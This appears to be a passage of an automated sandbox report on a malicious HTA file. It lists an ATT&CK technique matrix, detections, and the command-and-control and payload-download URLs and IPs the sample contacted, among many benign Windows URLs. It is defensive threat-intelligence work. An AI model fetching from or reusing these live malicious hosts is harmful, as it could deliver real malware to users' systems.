Source: Yara match	File source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	11 Native API	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Exploitation for Client Execution	1 DLL Side-Loading	623 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	11 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	128 System Information Discovery	Distributed Component Object Model	11 Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	531 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	623 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	22%	ReversingLabs	Script-JS.Trojan.Acsogenixx

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\djvbaae	0%	ReversingLabs

Source	Detection	Scanner	Label
http://prolinice.ga/ndex.phps	0%	Avira URL Cloud	safe
http://crl.microsoftOZ	0%	Avira URL Cloud	safe
http://107.172.44.178/53/WRFFRGT.txt	0%	Avira URL Cloud	safe
http://107.172.44.178/53/seemybe	0%	Avira URL Cloud	safe
http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF~	0%	Avira URL Cloud	safe
http://prolinice.ga/index.php	100%	Avira URL Cloud	malware
http://vilendar.ga/index.php	100%	Avira URL Cloud	malware
http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFv	0%	Avira URL Cloud	safe
http://prolinice.ga/index.phpR	0%	Avira URL Cloud	safe
http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF	0%	Avira URL Cloud	safe
http://prolinice.ga:80/index.php	100%	Avira URL Cloud	malware
http://prolinice.ga/index.phpMozilla/5.0	0%	Avira URL Cloud	safe
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0	0%	Avira URL Cloud	safe
http://prolinice.ga/	0%	Avira URL Cloud	safe
http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF4	0%	Avira URL Cloud	safe
http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF9	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ip.1017.filemail.com	142.215.209.78	true	false	high
prolinice.ga	46.173.214.24	true	true	unknown
1017.filemail.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://107.172.44.178/53/WRFFRGT.txt	true	Avira URL Cloud: safe	unknown
http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF	true	Avira URL Cloud: safe	unknown
http://prolinice.ga/index.php	true	Avira URL Cloud: malware	unknown
http://vilendar.ga/index.php	true	Avira URL Cloud: malware	unknown
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	false		high
https://duckduckgo.com/ac/?q=	explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	false		high
http://crl.microsoftOZ	powershell.exe, 00000009.00000002.2161675097.0000000006F03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://powerpoint.office.comcember	explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1017.filemail.com	powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	false		high
https://excel.office.com	explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://107.172.44.178/53/seemybe	powershell.exe, 00000001.00000002.1934299085.0000000005367000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://prolinice.ga/ndex.phps	explorer.exe, 00000011.00000002.2435370827.000000000321C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 0000000E.00000002.3016670516.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150001828.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2152605558.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 00000003.00000002.1824151467.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1934299085.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000004A71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	false		high
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF~	powershell.exe, 00000001.00000002.1954134272.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/q	explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1950833514.0000000005878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1826452749.00000000065A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 0000000E.00000002.3025073202.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2158219797.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFv	powershell.exe, 00000001.00000002.1954134272.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1934299085.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1824151467.0000000005541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000004A71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://prolinice.ga/index.phpR	explorer.exe, 00000011.00000002.2435370827.00000000031D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S	powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000E.00000002.3014261792.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.00000000079B1000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/L	explorer.exe, 0000000E.00000002.3025073202.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2158219797.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1950833514.0000000005878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1826452749.00000000065A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmp	false		high
https://word.office.com	explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://prolinice.ga/	explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000001.00000002.1934299085.0000000004967000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	false		high
http://prolinice.ga:80/index.php	explorer.exe, 0000000E.00000002.3025073202.000000000C4A0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.microsoft.	powershell.exe, 00000003.00000002.1828441360.0000000007B90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2652155063.0000000003525000.00000004.00000020.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	false		high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/Vh5j3k	explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6PO	powershell.exe, 00000003.00000002.1824151467.0000000005541000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 0000000E.00000000.2150818105.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000001.00000002.1932388414.0000000002C4E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://android.notify.windows.com/iOS	explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF4	powershell.exe, 00000001.00000002.1953902747.0000000007260000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF9	powershell.exe, 00000001.00000002.1954134272.0000000007290000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://prolinice.ga/index.phpMozilla/5.0	explorer.exe, 00000011.00000002.2435370827.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2391356204.0000000000538000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2397253387.0000000000767000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3007335205.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2660889863.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.3008863244.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3007619129.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3008824207.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3007631723.0000000000C38000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com_	explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com:443/en-us/feed	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.173.214.24	prolinice.ga	Russian Federation	47196	GARANT-PARK-INTERNETRU	true
142.215.209.78	ip.1017.filemail.com	Canada	32156	HUMBER-COLLEGECA	false
107.172.44.178	unknown	United States	36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557927
Start date and time:	2024-11-18 18:36:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
Detection:	MAL
Classification:	mal100.phis.bank.troj.spyw.expl.evad.winHTA@41/36@2/3
EGA Information:	Successful, ratio: 70.6%
HCA Information:	Successful, ratio: 97% Number of executed functions: 177 Number of non-executed functions: 90
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12
